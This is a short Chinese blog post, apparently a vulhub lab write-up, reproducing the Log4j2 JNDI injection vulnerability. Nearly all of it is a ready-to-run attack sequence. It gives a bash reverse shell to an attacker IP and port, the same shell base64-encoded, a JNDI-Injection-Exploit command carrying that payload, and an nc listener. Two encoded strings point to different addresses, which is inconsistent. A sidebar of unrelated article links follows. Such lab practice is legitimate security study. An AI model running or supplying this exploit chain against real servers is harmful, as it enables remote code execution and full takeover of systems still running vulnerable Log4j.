vulhub靶场log4j2漏洞复现

嘤嘤奶嘴酱2024-09-09 1:38

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问

相关推荐
chase。1 小时前
关于 nvidia-smi: no devices were found 解决方案
服务器·数据库·postgresql
Robpubking4 小时前
AWS 中 S3 的 server-side encryption 解释与说明
运维·aws
陌路207 小时前
Linux 34TCP服务器多进程并发
linux·服务器·网络
爱喝矿泉水的猛男7 小时前
单周期Risc-V指令拆分与datapath绘制
运维·服务器·risc-v
科技块儿7 小时前
【IP】公有&私有IP地址?
服务器·网络协议·tcp/ip
hakukun7 小时前
docker避免每次sudo方法
运维·docker·容器
杨凯凡7 小时前
Docker Compose:多容器应用编排入门与实战
运维·docker·容器
jason.zeng@15022077 小时前
my.cnf详解
运维·数据库·adb
灵神翁7 小时前
自建node云函数服务器
运维·服务器
TangDuoduo00058 小时前
【IO模型与并发服务器】
运维·服务器·网络·tcp/ip
热门推荐
01GitHub 镜像站点02BongoCat - 跨平台键盘猫动画工具03UV安装并设置国内源04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06《大数据技术原理与应用》实验报告三 熟悉HBase常用操作07jdk21下载、安装(Windows、Linux、macOS)082025 最新教程:注册并切换到美区 Apple ID09综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件10智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践